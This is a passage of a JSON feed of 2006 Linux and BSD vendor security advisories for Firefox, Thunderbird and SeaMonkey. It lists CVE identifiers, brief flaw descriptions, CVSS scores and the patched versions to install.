(CVE-2006-2776,\r\nCVE-2006-2784, CVE-2006-2785, CVE-2006-2787, CVE-2006-3807, CVE-2006-3809,\r\nCVE-2006-3812)\r\n\r\nSeveral denial of service flaws were found in the way Seamonkey processed\r\ncertain web content. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running Seamonkey.\r\n(CVE-2006-2779, CVE-2006-2780, CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\r\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\r\n\r\nTwo flaws were found in the way Seamonkey-mail displayed malformed\r\ninline vcard attachments. If a victim viewed an email message containing\r\na carefully crafted vcard it was possible to execute arbitrary code as the\r\nuser running Mozilla-mail. (CVE-2006-2781, CVE-2006-3804)\r\n\r\nA cross-site scripting flaw was found in the way Seamonkey processed\r\nUnicode Byte-Order-Mark (BOM) markers in UTF-8 web pages. A malicious web\r\npage could execute a script within the browser that a web input sanitizer\r\ncould miss due to a malformed \"script\" tag. (CVE-2006-2783)\r\n\r\nSeveral flaws were found in the way Seamonkey processed certain javascript\r\nactions. A malicious web page could conduct a cross-site scripting attack\r\nor steal sensitive information (such as cookies owned by other domains).\r\n(CVE-2006-3802, CVE-2006-3810)\r\n\r\nA form file upload flaw was found in the way Seamonkey handled javascript\r\ninput object mutation. A malicious web page could upload an arbitrary local\r\nfile at form submission time without user interaction. (CVE-2006-2782)\r\n\r\nA denial of service flaw was found in the way Seamonkey called the\r\ncrypto.signText() javascript function. A malicious web page could crash the\r\nbrowser if the victim had a client certificate loaded. (CVE-2006-2778)\r\n\r\nTwo HTTP response smuggling flaws were found in the way Seamonkey processed\r\ncertain invalid HTTP response headers. A malicious web site could return\r\nspecially crafted HTTP response headers which may bypass HTTP proxy\r\nrestrictions. (CVE-2006-2786)\r\n\r\nA flaw was found in the way Seamonkey processed Proxy AutoConfig scripts. A\r\nmalicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3808)\r\n\r\nA double free flaw was found in the way the nsIX509::getRawDER method was\r\ncalled. If a victim visited a carefully crafted web page, it was possible\r\nto execute arbitrary code as the user running Mozilla. (CVE-2006-2788)\r\n\r\nUsers of Mozilla are advised to upgrade to this update, which contains\r\nSeamonkey version 1.0.3 that corrects these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025154.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025155.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025163.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025164.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025165.html\n\n**Affected packages:**\ndevhelp\ndevhelp-devel\nseamonkey\nseamonkey-chat\nseamonkey-devel\nseamonkey-dom-inspector\nseamonkey-js-debugger\nseamonkey-mail\nseamonkey-nspr\nseamonkey-nspr-devel\nseamonkey-nss\nseamonkey-nss-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0609.html", "edition": 3, "modified": "2006-08-06T16:11:30", "published": "2006-08-05T15:16:05", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/025154.html", "id": "CESA-2006:0609", "title": "devhelp, seamonkey security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:17", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3113", "CVE-2006-3677", "CVE-2006-3801", "CVE-2006-3802", "CVE-2006-3803", "CVE-2006-3804", "CVE-2006-3805", "CVE-2006-3806", "CVE-2006-3807", "CVE-2006-3808", "CVE-2006-3809", "CVE-2006-3810", "CVE-2006-3811", "CVE-2006-3812"], "description": "SeaMonkey is an open source Web browser, advanced email and newsgroup\r\nclient, IRC chat client, and HTML editor.\r\n\r\nSeveral flaws were found in the way SeaMonkey processed certain javascript\r\nactions. A malicious web page could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3807,\r\nCVE-2006-3809, CVE-2006-3812)\r\n\r\nSeveral denial of service flaws were found in the way SeaMonkey processed\r\ncertain web content. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running SeaMonkey.\r\n(CVE-2006-3801, CVE-2006-3677, CVE-2006-3113, CVE-2006-3803, CVE-2006-3805,\r\nCVE-2006-3806, CVE-2006-3811)\r\n\r\nA buffer overflow flaw was found in the way SeaMonkey Messenger displayed\r\nmalformed inline vcard attachments. If a victim viewed an email message\r\ncontaining a carefully crafted vcard, it was possible to execute arbitrary\r\ncode as the user running SeaMonkey Messenger. (CVE-2006-3804)\r\n\r\nSeveral flaws were found in the way SeaMonkey processed certain javascript\r\nactions. A malicious web page could conduct a cross-site scripting attack\r\nor steal sensitive information (such as cookies owned by other domains).\r\n(CVE-2006-3802, CVE-2006-3810)\r\n\r\nA flaw was found in the way SeaMonkey processed Proxy AutoConfig scripts. A\r\nmalicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3808)\r\n\r\nUsers of SeaMonkey are advised to upgrade to this update, which contains\r\nSeaMonkey version 1.0.3 that corrects these issues.", "modified": "2017-07-29T20:33:39", "published": "2006-07-27T04:00:00", "id": "RHSA-2006:0608", "href": "https://access.redhat.com/errata/RHSA-2006:0608", "type": "redhat", "title": "(RHSA-2006:0608) seamonkey security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2776", "CVE-2006-2778", "CVE-2006-2779", "CVE-2006-2780", "CVE-2006-2782", "CVE-2006-2783", "CVE-2006-2784", "CVE-2006-2785", "CVE-2006-2786", "CVE-2006-2787", "CVE-2006-2788", "CVE-2006-3113", "CVE-2006-3677", "CVE-2006-3801", "CVE-2006-3802", "CVE-2006-3803", "CVE-2006-3805", "CVE-2006-3806", "CVE-2006-3807", "CVE-2006-3808", "CVE-2006-3809", "CVE-2006-3810", "CVE-2006-3811", "CVE-2006-3812"], "description": "Mozilla Firefox is an open source Web browser.\r\n\r\nThe Mozilla Foundation has discontinued support for the Mozilla Firefox\r\n1.0 branch. This update deprecates the Mozilla Firefox 1.0 branch in\r\nRed Hat Enterprise Linux 4 in favor of the supported Mozilla Firefox\r\n1.5 branch.\r\n\r\nThis update also resolves a number of outstanding Firefox security issues:\r\n\r\nSeveral flaws were found in the way Firefox processed certain javascript\r\nactions. A malicious web page could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-2776,\r\nCVE-2006-2784, CVE-2006-2785, CVE-2006-2787, CVE-2006-3807, CVE-2006-3809,\r\nCVE-2006-3812)\r\n\r\nSeveral denial of service flaws were found in the way Firefox processed\r\ncertain web content. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running Firefox.\r\n(CVE-2006-2779, CVE-2006-2780, CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\r\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\r\n\r\nA cross-site scripting flaw was found in the way Firefox processed\r\nUnicode Byte-Order-Mark (BOM) markers in UTF-8 web pages. A malicious web\r\npage could execute a script within the browser that a web input sanitizer\r\ncould miss due to a malformed \"script\" tag. (CVE-2006-2783)\r\n\r\nSeveral flaws were found in the way Firefox processed certain javascript\r\nactions. A malicious web page could conduct a cross-site scripting attack\r\nor steal sensitive information (such as cookies owned by other domains).\r\n(CVE-2006-3802, CVE-2006-3810)\r\n\r\nA form file upload flaw was found in the way Firefox handled javascript\r\ninput object mutation. A malicious web page could upload an arbitrary local\r\nfile at form submission time without user interaction. (CVE-2006-2782)\r\n\r\nA denial of service flaw was found in the way Firefox called the\r\ncrypto.signText() javascript function. A malicious web page could crash the\r\nbrowser if the victim had a client certificate loaded. (CVE-2006-2778)\r\n\r\nTwo HTTP response smuggling flaws were found in the way Firefox processed\r\ncertain invalid HTTP response headers. A malicious web site could return\r\nspecially crafted HTTP response headers which may bypass HTTP proxy\r\nrestrictions. (CVE-2006-2786)\r\n\r\nA flaw was found in the way Firefox processed Proxy AutoConfig scripts. A\r\nmalicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3808)\r\n\r\nA double free flaw was found in the way the nsIX509::getRawDER method was\r\ncalled. If a victim visited a carefully crafted web page, it was possible\r\nto execute arbitrary code as the user running Firefox. (CVE-2006-2788)\r\n\r\nUsers of Firefox are advised to upgrade to this update, which contains\r\nFirefox version 1.5.0.5 that corrects these issues.", "modified": "2017-09-08T11:54:53", "published": "2006-07-28T04:00:00", "id": "RHSA-2006:0610", "href": "https://access.redhat.com/errata/RHSA-2006:0610", "type": "redhat", "title": "(RHSA-2006:0610) firefox security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:37", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2776", "CVE-2006-2778", "CVE-2006-2779", "CVE-2006-2780", "CVE-2006-2781", "CVE-2006-2782", "CVE-2006-2783", "CVE-2006-2784", "CVE-2006-2785", "CVE-2006-2786", "CVE-2006-2787", "CVE-2006-2788", "CVE-2006-3113", "CVE-2006-3677", "CVE-2006-3801", "CVE-2006-3802", "CVE-2006-3803", "CVE-2006-3804", "CVE-2006-3805", "CVE-2006-3806", "CVE-2006-3807", "CVE-2006-3808", "CVE-2006-3809", "CVE-2006-3810", "CVE-2006-3811"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\r\n\r\nThe Mozilla Foundation has discontinued support for the Mozilla Thunderbird\r\n1.0 branch. This update deprecates the Mozilla Thunderbird 1.0 branch in\r\nRed Hat Enterprise Linux 4 in favor of the supported Mozilla Thunderbird\r\n1.5 branch.\r\n\r\nThis update also resolves a number of outstanding Thunderbird security issues:\r\n\r\nSeveral flaws were found in the way Thunderbird processed certain\r\njavascript actions. A malicious mail message could execute arbitrary\r\njavascript instructions with the permissions of \"chrome\", allowing the page\r\nto steal sensitive information or install browser malware. (CVE-2006-2776,\r\nCVE-2006-2784, CVE-2006-2785, CVE-2006-2787, CVE-2006-3807, CVE-2006-3809)\r\n\r\nSeveral denial of service flaws were found in the way Thunderbird processed\r\ncertain mail messages. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running Thunderbird.\r\n(CVE-2006-2779, CVE-2006-2780, CVE-2006-3801, CVE-2006-3677,\r\nCVE-2006-3113, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\r\n\r\nSeveral flaws were found in the way Thunderbird processed certain\r\njavascript actions. A malicious mail message could conduct a cross-site\r\nscripting attack or steal sensitive information (such as cookies owned by\r\nother domains). (CVE-2006-3802, CVE-2006-3810)\r\n\r\nA form file upload flaw was found in the way Thunderbird handled javascript\r\ninput object mutation. A malicious mail message could upload an arbitrary\r\nlocal file at form submission time without user interaction. (CVE-2006-2782)\r\n\r\nA denial of service flaw was found in the way Thunderbird called the\r\ncrypto.signText() javascript function. A malicious mail message could crash\r\nthe browser if the victim had a client certificate loaded. (CVE-2006-2778)\r\n\r\nA flaw was found in the way Thunderbird processed Proxy AutoConfig scripts.\r\nA malicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install client malware. (CVE-2006-3808)\r\n\r\nNote: Please note that JavaScript support is disabled by default in\r\nThunderbird. The above issues are not exploitable with JavaScript disabled. \r\n\r\nTwo flaws were found in the way Thunderbird displayed malformed inline\r\nvcard attachments. If a victim viewed an email message containing a\r\ncarefully crafted vcard it was possible to execute arbitrary code as the\r\nuser running Thunderbird. (CVE-2006-2781, CVE-2006-3804)\r\n\r\nA cross site scripting flaw was found in the way Thunderbird processed\r\nUnicode Byte-order-Mark (BOM) markers in UTF-8 mail messages. A malicious\r\nweb page could execute a script within the browser that a web input\r\nsanitizer could miss due to a malformed \"script\" tag. (CVE-2006-2783)\r\n\r\nTwo HTTP response smuggling flaws were found in the way Thunderbird\r\nprocessed certain invalid HTTP response headers. A malicious web site could\r\nreturn specially crafted HTTP response headers which may bypass HTTP proxy\r\nrestrictions. (CVE-2006-2786)\r\n\r\nA double free flaw was found in the way the nsIX509::getRawDER method was\r\ncalled. If a victim visited a carefully crafted web page, it was possible\r\nto crash Thunderbird. (CVE-2006-2788)\r\n\r\nUsers of Thunderbird are advised to upgrade to this update, which contains\r\nThunderbird version 1.5.0.5 that corrects these issues.", "modified": "2017-09-08T12:12:04", "published": "2006-07-28T04:00:00", "id": "RHSA-2006:0611", "href": "https://access.redhat.com/errata/RHSA-2006:0611", "type": "redhat", "title": "(RHSA-2006:0611) thunderbird security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2776", "CVE-2006-2778", "CVE-2006-2779", "CVE-2006-2780", "CVE-2006-2781", "CVE-2006-2782", "CVE-2006-2783", "CVE-2006-2784", "CVE-2006-2785", "CVE-2006-2786", "CVE-2006-2787", "CVE-2006-2788", "CVE-2006-3113", "CVE-2006-3677", "CVE-2006-3801", "CVE-2006-3802", "CVE-2006-3803", "CVE-2006-3804", "CVE-2006-3805", "CVE-2006-3806", "CVE-2006-3807", "CVE-2006-3808", "CVE-2006-3809", "CVE-2006-3810", "CVE-2006-3811", "CVE-2006-3812"], "description": "SeaMonkey is an open source Web browser, advanced email and newsgroup\r\nclient, IRC chat client, and HTML editor.\r\n\r\nThe Mozilla Foundation has discontinued support for the Mozilla Suite. This\r\nupdate deprecates the Mozilla Suite in Red Hat Enterprise Linux 2.1 in\r\nfavor of the supported SeaMonkey Suite.\r\n\r\nThis update also resolves a number of outstanding Mozilla security issues:\r\n\r\nSeveral flaws were found in the way SeaMonkey processed certain javascript\r\nactions. A malicious web page could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-2776,\r\nCVE-2006-2784, CVE-2006-2785, CVE-2006-2787, CVE-2006-3807, CVE-2006-3809,\r\nCVE-2006-3812)\r\n\r\nSeveral denial of service flaws were found in the way SeaMonkey processed\r\ncertain web content. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running SeaMonkey.\r\n(CVE-2006-2779, CVE-2006-2780, CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\r\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\r\n\r\nTwo flaws were found in the way SeaMonkey Messenger displayed malformed\r\ninline vcard attachments. If a victim viewed an email message containing\r\na carefully crafted vcard it was possible to execute arbitrary code as the\r\nuser running SeaMonkey Messenger. (CVE-2006-2781, CVE-2006-3804)\r\n\r\nA cross-site scripting flaw was found in the way SeaMonkey processed\r\nUnicode Byte-Order-Mark (BOM) markers in UTF-8 web pages. A malicious web\r\npage could execute a script within the browser that a web input sanitizer\r\ncould miss due to a malformed \"script\" tag. (CVE-2006-2783)\r\n\r\nSeveral flaws were found in the way SeaMonkey processed certain javascript\r\nactions. A malicious web page could conduct a cross-site scripting attack\r\nor steal sensitive information (such as cookies owned by other domains).\r\n(CVE-2006-3802, CVE-2006-3810)\r\n\r\nA form file upload flaw was found in the way SeaMonkey handled javascript\r\ninput object mutation. A malicious web page could upload an arbitrary local\r\nfile at form submission time without user interaction. (CVE-2006-2782)\r\n\r\nA denial of service flaw was found in the way SeaMonkey called the\r\ncrypto.signText() javascript function. A malicious web page could crash the\r\nbrowser if the victim had a client certificate loaded. (CVE-2006-2778)\r\n\r\nTwo HTTP response smuggling flaws were found in the way SeaMonkey processed\r\ncertain invalid HTTP response headers. A malicious web site could return\r\nspecially crafted HTTP response headers which may bypass HTTP proxy\r\nrestrictions. (CVE-2006-2786)\r\n\r\nA flaw was found in the way SeaMonkey processed Proxy AutoConfig scripts. A\r\nmalicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3808)\r\n\r\nA double free flaw was found in the way the nsIX509::getRawDER method was\r\ncalled. If a victim visited a carefully crafted web page it was possible to\r\nexecute arbitrary code as the user running SeaMonkey. (CVE-2006-2788)\r\n\r\nUsers of Mozilla are advised to upgrade to this update, which contains\r\nSeaMonkey version 1.0.3 that corrects these issues.", "modified": "2018-03-14T19:28:05", "published": "2006-08-28T04:00:00", "id": "RHSA-2006:0594", "href": "https://access.redhat.com/errata/RHSA-2006:0594", "type": "redhat", "title": "(RHSA-2006:0594) seamonkey security update (was mozilla)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:27", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2776", "CVE-2006-2778", "CVE-2006-2779", "CVE-2006-2780", "CVE-2006-2781", "CVE-2006-2782", "CVE-2006-2783", "CVE-2006-2784", "CVE-2006-2785", "CVE-2006-2786", "CVE-2006-2787", "CVE-2006-2788", "CVE-2006-3113", "CVE-2006-3677", "CVE-2006-3801", "CVE-2006-3802", "CVE-2006-3803", "CVE-2006-3804", "CVE-2006-3805", "CVE-2006-3806", "CVE-2006-3807", "CVE-2006-3808", "CVE-2006-3809", "CVE-2006-3810", "CVE-2006-3811", "CVE-2006-3812"], "description": "Seamonkey is an open source Web browser, advanced email and newsgroup\r\nclient, IRC chat client, and HTML editor.\r\n\r\nThe Mozilla Foundation has discontinued support for the Mozilla Suite. This\r\nupdate deprecates the Mozilla Suite in Red Hat Enterprise Linux 4 in\r\nfavor of the supported Seamonkey Suite.\r\n\r\nThis update also resolves a number of outstanding Mozilla security issues:\r\n\r\nSeveral flaws were found in the way Seamonkey processed certain javascript\r\nactions. A malicious web page could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-2776,\r\nCVE-2006-2784, CVE-2006-2785, CVE-2006-2787, CVE-2006-3807, CVE-2006-3809,\r\nCVE-2006-3812)\r\n\r\nSeveral denial of service flaws were found in the way Seamonkey processed\r\ncertain web content. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running Seamonkey.\r\n(CVE-2006-2779, CVE-2006-2780, CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\r\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\r\n\r\nTwo flaws were found in the way Seamonkey-mail displayed malformed\r\ninline vcard attachments. If a victim viewed an email message containing\r\na carefully crafted vcard it was possible to execute arbitrary code as the\r\nuser running Mozilla-mail. (CVE-2006-2781, CVE-2006-3804)\r\n\r\nA cross-site scripting flaw was found in the way Seamonkey processed\r\nUnicode Byte-Order-Mark (BOM) markers in UTF-8 web pages. A malicious web\r\npage could execute a script within the browser that a web input sanitizer\r\ncould miss due to a malformed \"script\" tag. (CVE-2006-2783)\r\n\r\nSeveral flaws were found in the way Seamonkey processed certain javascript\r\nactions. A malicious web page could conduct a cross-site scripting attack\r\nor steal sensitive information (such as cookies owned by other domains).\r\n(CVE-2006-3802, CVE-2006-3810)\r\n\r\nA form file upload flaw was found in the way Seamonkey handled javascript\r\ninput object mutation. A malicious web page could upload an arbitrary local\r\nfile at form submission time without user interaction. (CVE-2006-2782)\r\n\r\nA denial of service flaw was found in the way Seamonkey called the\r\ncrypto.signText() javascript function. A malicious web page could crash the\r\nbrowser if the victim had a client certificate loaded. (CVE-2006-2778)\r\n\r\nTwo HTTP response smuggling flaws were found in the way Seamonkey processed\r\ncertain invalid HTTP response headers. A malicious web site could return\r\nspecially crafted HTTP response headers which may bypass HTTP proxy\r\nrestrictions. (CVE-2006-2786)\r\n\r\nA flaw was found in the way Seamonkey processed Proxy AutoConfig scripts. A\r\nmalicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3808)\r\n\r\nA double free flaw was found in the way the nsIX509::getRawDER method was\r\ncalled. If a victim visited a carefully crafted web page, it was possible\r\nto execute arbitrary code as the user running Mozilla. (CVE-2006-2788)\r\n\r\nUsers of Mozilla are advised to upgrade to this update, which contains\r\nSeamonkey version 1.0.3 that corrects these issues.", "modified": "2017-09-08T11:49:07", "published": "2006-08-02T04:00:00", "id": "RHSA-2006:0609", "href": "https://access.redhat.com/errata/RHSA-2006:0609", "type": "redhat", "title": "(RHSA-2006:0609) seamonkey security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:41:24", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "description": "To fix various security problems we released update packages that bring Mozilla Firefox to version 1.5.0.6, MozillaThunderdbird to version 1.5.0.5 and the Seamonkey Suite to version 1.0.3.\n#### Solution\nThere is no known workaround, please install the update packages. If you are using the old Mozilla Suite browser we recommend no longer using it, but switching to Mozilla Firefox, konqueror or Opera.", "edition": 1, "modified": "2006-08-16T15:11:18", "published": "2006-08-16T15:11:18", "id": "SUSE-SA:2006:048", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-08/msg00014.html", "title": "remote code execution in MozillaFirefox,MozillaThunderbird,Seamonkey", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "description": "\nA Mozilla Foundation Security Advisory reports of multiple\n\t issues. Several of which can be used to run arbitrary code\n\t with the privilege of the user running the program.\n\n\nMFSA 2006-56 chrome: scheme loading remote content\nMFSA 2006-55 Crashes with evidence of memory corruption\n\t (rv:1.8.0.5)\nMFSA 2006-54 XSS with\n\t XPCNativeWrapper(window).Function(...)\nMFSA 2006-53 UniversalBrowserRead privilege escalation\nMFSA 2006-52 PAC privilege escalation using\n\t Function.prototype.call\nMFSA 2006-51 Privilege escalation using named-functions\n\t and redefined \"new Object()\"\nMFSA 2006-50 JavaScript engine vulnerabilities\nMFSA 2006-49 Heap buffer overwrite on malformed VCard\nMFSA 2006-48 JavaScript new Function race condition\nMFSA 2006-47 Native DOM methods can be hijacked across\n\t domains\nMFSA 2006-46 Memory corruption with simultaneous events\nMFSA 2006-45 Javascript navigator Object Vulnerability\nMFSA 2006-44 Code execution through deleted frame\n\t reference\n\n\n", "edition": 4, "modified": "2006-11-02T00:00:00", "published": "2006-07-25T00:00:00", "id": "E2A92664-1D60-11DB-88CF-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/e2a92664-1d60-11db-88cf-000c6ec775d9.html", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-2780", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-2784", "CVE-2006-3677", "CVE-2006-2785", "CVE-2006-2776", "CVE-2006-2778", "CVE-2006-3810", "CVE-2006-2779", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-2786", "CVE-2006-3113", "CVE-2006-2783", "CVE-2006-3805", "CVE-2006-2788", "CVE-2006-2787", "CVE-2006-3808", "CVE-2006-2782", "CVE-2006-3802"], "description": " [1.5.0.8-0.1.1.el4]\n - Replace default-bookmarks.html and default-prefs.js\n \n [1.5.0.8-0.1.el4]\n - Update to 1.5.0.8 (RC)\n \n [1.5.0.7-0.1.el4]\n - Update to 1.5.0.7\n \n [1.5.0.5-0.el4.1]\n - Update to 1.5.0.5 ", "edition": 4, "modified": "2006-12-07T00:00:00", "published": "2006-12-07T00:00:00", "id": "ELSA-2006-0610", "href": "http://linux.oracle.com/errata/ELSA-2006-0610.html", "title": "Critical firefox security update ", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:02", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-2780", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-2784", "CVE-2006-3677", "CVE-2006-2785", "CVE-2006-2776", "CVE-2006-3804", "CVE-2006-2778", "CVE-2006-3810", "CVE-2006-2779", "CVE-2006-2781", "CVE-2006-3801", "CVE-2006-2786", "CVE-2006-3113", "CVE-2006-2783", "CVE-2006-3805", "CVE-2006-2788", "CVE-2006-2787", "CVE-2006-3808", "CVE-2006-2782", "CVE-2006-3802"], "description": " [1.5.0.8-0.1.1.el4]\n - defaults changed to oracle...\n \n [1.5.0.8-0.1.el4]\n - Update to 1.5.0.8 (RC)\n \n [1.5.0.7-0.1.el4]\n - Update to 1.5.0.7\n \n [1.5.0.5-0.el4.2]\n - Fix the launcher and icons\n \n [1.5.0.5-0.el4.1]\n - Update to 1.5.0.5 ", "edition": 4, "modified": "2006-12-07T00:00:00", "published": "2006-12-07T00:00:00", "id": "ELSA-2006-0611", "href": "http://linux.oracle.com/errata/ELSA-2006-0611.html", "title": "Critical thunderbird security update ", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}